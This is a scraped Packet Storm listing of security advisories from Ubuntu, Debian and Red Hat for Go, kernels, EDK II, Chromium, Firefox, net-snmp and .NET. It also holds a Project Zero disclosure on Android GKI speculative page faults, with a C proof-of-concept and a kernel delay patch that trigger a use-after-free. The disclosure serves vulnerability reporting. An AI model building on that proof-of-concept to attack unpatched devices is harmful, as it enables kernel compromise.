Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Wireshark Analyzer 4.4.1

Ubuntu Security Notice 7061-1 - Hunter Wittenborn discovered that Go incorrectly handled the sanitization of environment variables. An attacker could possibly use this issue to run arbitrary commands. Sohom Datta discovered that Go did not properly validate backticks as Javascript string delimiters, and did not escape them as expected. An attacker could possibly use this issue to inject arbitrary Javascript code into the Go template.

==========================================================================  
Ubuntu Security Notice USN-7061-1  
October 10, 2024

golang-1.17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Go.

Software Description:  
- golang-1.17: Go programming language compiler - metapackage

Details:

Hunter Wittenborn discovered that Go incorrectly handled the sanitization  
of environment variables. An attacker could possibly use this issue to run  
arbitrary commands. (CVE-2023-24531)

Sohom Datta discovered that Go did not properly validate backticks (`) as  
Javascript string delimiters, and did not escape them as expected. An  
attacker could possibly use this issue to inject arbitrary Javascript code  
into the Go template. (CVE-2023-24538)

Juho Nurminen discovered that Go incorrectly handled certain special  
characters in directory or file paths. An attacker could possibly use  
this issue to inject code into the resulting binaries. (CVE-2023-29402)

Vincent Dehors discovered that Go incorrectly handled permission bits.  
An attacker could possibly use this issue to read or write files with  
elevated privileges. (CVE-2023-29403)

Juho Nurminen discovered that Go incorrectly handled certain crafted  
arguments. An attacker could possibly use this issue to execute arbitrary  
code at build time. (CVE-2023-29405)

It was discovered that Go incorrectly validated the contents of host  
headers. A remote attacker could possibly use this issue to inject  
additional headers or entire requests. (CVE-2023-29406)

Takeshi Kaneko discovered that Go did not properly handle comments and  
special tags in the script context of html/template module. An attacker  
could possibly use this issue to inject Javascript code and perform a  
cross-site scripting attack. (CVE-2023-39318, CVE-2023-39319)

It was discovered that Go did not limit the number of simultaneously  
executing handler goroutines in the net/http module. An attacker could  
possibly use this issue to cause a panic resulting in a denial of service.  
(CVE-2023-39325)

It was discovered that the Go html/template module did not validate errors  
returned from MarshalJSON methods. An attacker could possibly use this  
issue to inject arbitrary code into the Go template. (CVE-2024-24785)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  golang-1.17                     1.17.13-3ubuntu1.2  
  golang-1.17-go                  1.17.13-3ubuntu1.2  
  golang-1.17-src                 1.17.13-3ubuntu1.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7061-1  
  CVE-2023-24531, CVE-2023-24538, CVE-2023-29402, CVE-2023-29403,  
  CVE-2023-29404, CVE-2023-29405, CVE-2023-29406, CVE-2023-39318,  
  CVE-2023-39319, CVE-2023-39325, CVE-2024-24785

Package Information:  
  https://launchpad.net/ubuntu/+source/golang-1.17/1.17.13-3ubuntu1.2

Ubuntu Security Notice USN-7061-1

Ubuntu Security Notice 7022-3 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7022-3October 10, 2024linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Modular ISDN driver;  - MMC subsystem;  - SCSI drivers;  - F2FS file system;  - GFS2 file system;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2021-47188, CVE-2024-39494, CVE-2022-48791, CVE-2022-48863,CVE-2024-42228, CVE-2024-38570, CVE-2024-42160, CVE-2024-26787,CVE-2024-27012, CVE-2024-26677)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-5.4.0-1117-raspi    5.4.0-1117.129~18.04.1                                  Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1117.129~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7022-3  https://ubuntu.com/security/notices/USN-7022-2  https://ubuntu.com/security/notices/USN-7022-1  CVE-2021-47188, CVE-2022-48791, CVE-2022-48863, CVE-2024-26677,  CVE-2024-26787, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-42160, CVE-2024-42228

Ubuntu Security Notice USN-7022-3

Ubuntu Security Notice 7060-1 - It was discovered that EDK II did not check the buffer length in XHCI, which could lead to a stack overflow. A local attacker could potentially use this issue to cause a denial of service. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Laszlo Ersek discovered that EDK II incorrectly handled recursion. A remote attacker could possibly use this issue to cause EDK II to consume resources, leading to a denial of service. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-7060-1  
October 10, 2024

edk2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in EDK II.

Software Description:  
- edk2: UEFI firmware for virtual machines

Details:

It was discovered that EDK II did not check the buffer length in XHCI,  
which could lead to a stack overflow. A local attacker could potentially  
use this issue to cause a denial of service. This issue only affected  
Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-0161)

Laszlo Ersek discovered that EDK II incorrectly handled recursion. A  
remote attacker could possibly use this issue to cause EDK II to consume  
resources, leading to a denial of service. This issue only affected  
Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2021-28210)

Satoshi Tanda discovered that EDK II incorrectly handled decompressing  
certain images. A remote attacker could use this issue to cause EDK II to  
crash, resulting in a denial of service, or possibly execute arbitrary  
code. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.  
(CVE-2021-28211)

It was discovered that EDK II incorrectly decoded certain strings. A remote  
attacker could use this issue to cause EDK II to crash, resulting in a  
denial of service, or possibly execute arbitrary code. This issue only  
affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2021-38575)

It was discovered that EDK II had integer underflow vulnerability in  
SmmEntryPoint, which could result in a buffer overflow. An attacker  
could potentially use this issue to cause a denial of service.  
(CVE-2021-38578)

Elison Niven discovered that OpenSSL, vendored in EDK II, incorrectly  
handled the c_rehash script. A local attacker could possibly use this  
issue to execute arbitrary commands when c_rehash is run. This issue  
only affected Ubuntu 16.04 LTS. (CVE-2022-1292)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  ovmf                            2022.02-3ubuntu0.22.04.3  
  ovmf-ia32                       2022.02-3ubuntu0.22.04.3  
  qemu-efi-aarch64                2022.02-3ubuntu0.22.04.3  
  qemu-efi-arm                    2022.02-3ubuntu0.22.04.3

Ubuntu 20.04 LTS  
  ovmf                            0~20191122.bd85bf54-2ubuntu3.6  
  qemu-efi-aarch64                0~20191122.bd85bf54-2ubuntu3.6  
  qemu-efi-arm                    0~20191122.bd85bf54-2ubuntu3.6

Ubuntu 18.04 LTS  
  ovmf 0~20180205.c0d9813c-2ubuntu0.3+esm2  
                                  Available with Ubuntu Pro  
  qemu-efi-aarch64 0~20180205.c0d9813c-2ubuntu0.3+esm2  
                                  Available with Ubuntu Pro  
  qemu-efi-arm 0~20180205.c0d9813c-2ubuntu0.3+esm2  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  ovmf 0~20160408.ffea0a2c-2ubuntu0.2+esm3  
                                  Available with Ubuntu Pro  
  qemu-efi 0~20160408.ffea0a2c-2ubuntu0.2+esm3  
                                  Available with Ubuntu Pro

After a standard system update you need to restart the virtual machines  
that use the affected firmware to make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7060-1  
  CVE-2019-0161, CVE-2021-28210, CVE-2021-28211, CVE-2021-38575,  
  CVE-2021-38578, CVE-2022-1292

Package Information:  
https://launchpad.net/ubuntu/+source/edk2/2022.02-3ubuntu0.22.04.3  
https://launchpad.net/ubuntu/+source/edk2/0~20191122.bd85bf54-2ubuntu3.6

Ubuntu Security Notice USN-7060-1

Debian Linux Security Advisory 5787-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5787-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 09, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-9602 CVE-2024-9603Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.100-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmcGuh0ACgkQZF0CR8NudjdP/w/6Apzn8iDKtKPttv+lXU07odw69w18PpHAhgCDgBBScoPM2caX/aBqL0yn8cHZf/aviZVocGgBHgqOn24TAdn8dv0chqpL6wGVumrEMiCuZC6cUFoKZpreembZMKjOFaYYWwKGq1abB65h043lYj5nbpKYKbYpy7sj+foyuTvY9n/d+Lb9L8TMSYqyo4wp+maehWy1aG5KwqSw2tKzKWef6txBxOD7HJ+2M2mG7Ml2d8YR8mxrCGupZCSLay4z8Hf6v0rQh7Xg7X9iAnnrJklmIAoXyV7oKXuE62lo0ElfJ3pyGZh7Ks/nxpp+Z2Vk7XK95EMlnre2FNell6Ut7IMBxFjKBh+QF4SVoe2vqBsiU/yryQrL12bbCIQvGijMfnSd+7j4XklD0zTfaSziWxeX4RXXH31YGbEkAtCcv+TldnTX5qmNp6wAG5H5JFafZ5P+bQ8+AO6WYlUAFPDG6GeWOPjGSZzAJKDzYIT3Yvw9zZKGgWQn1OXLCle2sXOU3d6rKnL0tOqAObEZydINE2YlTo7W23MbFNqqgQQS6I0iQZn1tL34rZacxKVhHTSikiat7p3p5o9RN+e7mA+kvh9ot113e1Ri14k7vyEYzlZp0Rt4vZtifnavtkVWPpPCG26NAQDIuPpCeM/dUJYs0nDqZe5Mce7qMcm68+vTMr34z00==QEGj-----END PGP SIGNATURE-----

Debian Security Advisory 5787-1

Ubuntu Security Notice 7059-1 - Fabian Vogt discovered that OATH Toolkit incorrectly handled file permissions. A remote attacker could possibly use this issue to overwrite root owned files, leading to a privilege escalation attack.

==========================================================================

Ubuntu Security Notice USN-7059-1  
October 09, 2024

oath-toolkit vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS

Summary:

oath-toolkit could be made overwrite files as the administrator.

Software Description:  
- oath-toolkit: Development files for the OATH Toolkit Liboath library

Details:

Fabian Vogt discovered that OATH Toolkit incorrectly handled file  
permissions. A remote attacker could possibly use this issue to  
overwrite root owned files, leading to a privilege escalation attack.  
(CVE-2024-47191)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  liboath-dev                     2.6.11-2.1ubuntu0.1

Ubuntu 22.04 LTS  
  liboath-dev                     2.6.7-3ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-7059-1   
<https://ubuntu.com/security/notices/USN-7059-1>  
  CVE-2024-47191

Package Information:  
https://launchpad.net/ubuntu/+source/oath-toolkit/2.6.11-2.1ubuntu0.1   
<https://launchpad.net/ubuntu/+source/oath-toolkit/2.6.11-2.1ubuntu0.1>  
https://launchpad.net/ubuntu/+source/oath-toolkit/2.6.7-3ubuntu0.1   
<https://launchpad.net/ubuntu/+source/oath-toolkit/2.6.7-3ubuntu0.1>

Ubuntu Security Notice USN-7059-1

Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to use-after-free conditions.

    A central recurring theme in Linux MM development is that contention on themmap lock can have a big negative performance impact on multithreaded workloads:If one thread is holding the mmap lock in exclusive mode for an extended amountof time, other threads will block as soon as they try to handle a page fault.Therefore there is a bunch of work to downgrade exclusive lock holders tonon-exclusive lock holders, shrink critical sections, and avoid holding the lockaltogether in some cases.One proposal to avoid holding the mmap lock in page fault handling are"Speculative page faults (SPF)"; here's a patch series from 2019 that had alreadygone through 11 rounds of review:https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/This patch series didn't land at the time; but something along those lines mightland upstream in the next few years.But for some reason, Android decided that they need speculative page faultsimmediately, and merged the patches that were discussed on the upstream mailinglist into their GKI kernels. This is problematic for two reasons:A) The MM code is complicated and easy to get wrong.If you run MM code that has not been through the fuzzing, testing and reviewthat committed upstream code gets, there's a higher chance of undiscoveredbugs.B) The SPF patches **change the rules** that MM code has to follow, so nowAndroid's version of MM has different rules than upstream MM.This means that any patches in vaguely related parts of upstream MM need tobe checked by an Android engineer to see if they conflict with Android'sspecial rules.As far as I can tell, there are a bunch of memory safety bugs in the SPF versionthat is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):    handle_pte_fault() calls pmd_none() without protection against concurrent    page table deletion, leading to UAF read.    do_anonymous_page() calls pte_alloc() without protection against concurrent    page table deletion, leading to UAF write.    do_anonymous_page() calls pmd_trans_unstable() without protection against    concurrent page table deletion, leading to UAF read.    do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates    on a page table without protection against concurrent page table deletion,    leading to use-after-union-change read+write in struct page (on the page    table lock) and use-after-free read of a page table entry (resulting in bogus    page* calculation)    do_wp_page() calls handle_userfault() without protection against concurrent    userfaultfd_release(), leading to UAF reads of some flags from    userfaultfd_ctx.    I think back when the SPF series was posted upstream, there might have been    sufficient protection against this (because ___handle_speculative_fault()    bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd    support was added, and ___handle_speculative_fault() doesn't bail on    VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses    userfaultfd_pte_wp() which reads flags from the VMA.    The way seqcounts are used to detect concurrent writers looks wrong.    The seqcount API requires that only one writer at a time can be in a    vm_write_begin() / vm_write_end() section, but these helpers are used in    codepaths that only hold the mmap lock in shared mode, so there can be    concurrent writers.    As far as I can tell, this means that when there are an even number of    concurrent writers, it will look as if there are no active writers.    This probably doesn't have much security impact because all of the places    that do vm_write_begin() where concurrency would be an actual problem seem to    hold the mmap lock in exclusive mode?As an example, I tested https://crbug.com/project-zero/2. To reproduce this easily, I patched an extradelay into the kernel:diff --git a/mm/memory.c b/mm/memory.c  index 83b715ed65775..35ce412d0a965 100644  --- a/mm/memory.c  +++ b/mm/memory.c  @@ -84,6 +84,8 @@   #include <asm/tlb.h>   #include <asm/tlbflush.h>     +#include <linux/delay.h>  +   #include "pgalloc-track.h"   #include "internal.h"     @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault \*vmf)          vm_fault_t ret = 0;          pte_t entry;     +       if (strcmp(current->comm, "SLOWME") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {  +               pr_warn("%s: BEGIN DELAY 0x%lx\n", __func__, vmf->address);  +               mdelay(2000);  +               pr_warn("%s: END DELAY 0x%lx\n", __func__, vmf->address);  +       }  +          /\* File mapping without ->vm_ops ? \*/          if (vmf->vma_flags & VM_SHARED)                  return VM_FAULT_SIGBUS;  Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:#define _GNU_SOURCE  #include <pthread.h>  #include <err.h>  #include <unistd.h>  #include <sys/prctl.h>  #include <sys/mman.h>    // basic idea:  // delete the 1G-covering page table while do_anonymous_page() is at its entry  // point    #define VMA_ADDR ((void\*)0x40000000UL)  #define VMA_SIZE (0x40000000UL)    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    static void \*thread_fn(void \*dummy) {    SYSCHK(prctl(PR_SET_NAME, "SLOWME"));    \*(volatile char \*)VMA_ADDR;    SYSCHK(prctl(PR_SET_NAME, "spfthread"));  }    int main(void) {    SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,                          MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));    SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));    // create anon_vma and page tables    \*(volatile char \*)(VMA_ADDR+0x1000) = 1;      pthread_t thread;    if (pthread_create(&thread, NULL, thread_fn, NULL))      errx(1, "pthread_create");      sleep(1);    munmap(VMA_ADDR, VMA_SIZE);      if (pthread_join(thread, NULL))      errx(1, "pthread_join");    return 0;  }  This first results in a UAF read of a PTE:do_anonymous_page: BEGIN DELAY 0x40000000  do_anonymous_page: END DELAY 0x40000000  ==================================================================  BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)   Read of size 8 at addr ffff88800f358000 by task SLOWME/724    CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014  Call Trace:  dump_stack_lvl (lib/dump_stack.c:120)   [...]  print_address_description.constprop.0 (mm/kasan/report.c:257)   [...]  [...]  kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460)   [...]  handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)   [...]  ___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106)   [...]  __handle_speculative_fault (mm/memory.c:5148)   [...]  do_user_addr_fault (arch/x86/mm/fault.c:1320)   [...]  exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518)   [...]  asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571)   RIP: 0033:0x55d52bfe41fb  Then pte_alloc() tries to lock the page table entry:BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112)   Read of size 4 at addr ffff88801a730004 by task SLOWME/724  and after that, it will write into the freed page table.From a security perspective, my recommendation is to fix this by reverting thespeculative page fault patches out of the GKI trees, since I believe that sucha divergence from upstream semantics is not maintainable. Looking through thecommit history of the AOSP android13-5.10 kernel branch also shows that a seriesof bugs have already been discovered that were introduced by SPF:81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPFc3cbea92297d5 ANDROID: mm: avoid writing to read-only elementsdd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handlingcf397c6c269ac ANDROID: mm: sync rss in speculative page fault path531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page faultThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-02-01.Please note that, according to our disclosure policy, if Project Zero discoversa variant of a previously reported Project Zero bug, technical details of thevariant will be added to the existing Project Zero report (which may be alreadypublic) and the report will not receive a new deadline.Project Zero will consider new race conditions where the SPF fault path accessespage tables or the VMA without sufficient locking variants of this issue.This includes issues that are introduced after this bug is reported.For more details, seehttps://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Related CVE Number: CVE-2023-20937.Discovered By jannh

Android GKI Kernels Use-After-Free

Red Hat Security Advisory 2024-7958-03 - An update for firefox is now available for Red Hat Enterprise Linux 9. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7958.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:7958-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7958Issue date:         2024-10-10Revision:           03CVE Names:          CVE-2024-9680====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill) (CVE-2024-9680)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9680References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317442

Red Hat Security Advisory 2024-7958-03

Red Hat Security Advisory 2024-7875-03 - An update for net-snmp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include buffer overflow and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7875.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: net-snmp security update  
Advisory ID:        RHSA-2024:7875-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7875  
Issue date:         2024-10-10  
Revision:           03  
CVE Names:          CVE-2022-24805  
====================================================================

Summary: 

An update for net-snmp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The net-snmp packages provide various libraries and tools for the Simple Network Management Protocol (SNMP), including an SNMP library, an extensible agent, tools for requesting or setting information from SNMP agents, tools for generating and handling SNMP traps, a version of the netstat command which uses SNMP, and a Tk/Perl Management Information Base (MIB) browser.

Security Fix(es):

* net-snmp: A buffer overflow in the handling of the INDEX of             NET-SNMP-VACM-MIB can cause an out-of-bounds memory access. (CVE-2022-24805)

* : net-snmp: Improper Input Validation when SETing malformed OIDs in master agent and subagent simultaneously (CVE-2022-24806)

* net-snmp: A malformed OID in a SET request to SNMP-VIEW-BASED-ACM-MIB::vacmAccessTable can cause an out-of-bounds memory access (CVE-2022-24807)

* net-snmp: A malformed OID in a GET-NEXT to the nsVacmAccessTable can cause a NULL pointer dereference. (CVE-2022-24809)

* net-snmp: A malformed OID in a SET request to NET-SNMP-AGENT-MIB::nsLogTable can cause a NULL pointer dereference (CVE-2022-24808)

* net-snmp: A malformed OID in a SET to the nsVacmAccessTable can cause a NULL pointer dereference. (CVE-2022-24810)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-24805

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2103225  
https://bugzilla.redhat.com/show_bug.cgi?id=2104759  
https://bugzilla.redhat.com/show_bug.cgi?id=2104763  
https://bugzilla.redhat.com/show_bug.cgi?id=2104766  
https://bugzilla.redhat.com/show_bug.cgi?id=2104768  
https://bugzilla.redhat.com/show_bug.cgi?id=2104769

Red Hat Security Advisory 2024-7875-03

Red Hat Security Advisory 2024-7869-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 9. Issues addressed include code execution and denial of service vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7869.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: .NET 8.0 security update  
Advisory ID:        RHSA-2024:7869-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7869  
Issue date:         2024-10-09  
Revision:           03  
CVE Names:          CVE-2024-38229  
====================================================================

Summary: 

An update for .NET 8.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.110 and .NET Runtime 8.0.10.

Security Fix(es):

* dotnet: kestrel: closing an HTTP/3 stream can cause a race condition and lead to remote code execution (CVE-2024-38229)  
* dotnet: Multiple .NET components susceptible to hash flooding (CVE-2024-43483)  
* dotnet: System.IO.Packaging - Multiple DoS vectors in use of SortedList (CVE-2024-43484)  
* dotnet: Denial of Service in System.Text.Json (CVE-2024-43485)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Security Fix(es):

* dotnet: System.IO.Packaging - Multiple DoS vectors in use of SortedList (CVE-2024-43484)

* dotnet: Multiple .NET components susceptible to hash flooding (CVE-2024-43483)

* dotnet: Denial of Service in System.Text.Json (CVE-2024-43485)

* dotnet: kestrel: closing an HTTP/3 stream can cause a race condition and lead to remote code execution (CVE-2024-38229)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-38229

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2315729  
https://bugzilla.redhat.com/show_bug.cgi?id=2315730  
https://bugzilla.redhat.com/show_bug.cgi?id=2315731  
https://bugzilla.redhat.com/show_bug.cgi?id=2316161

Source

Packet Storm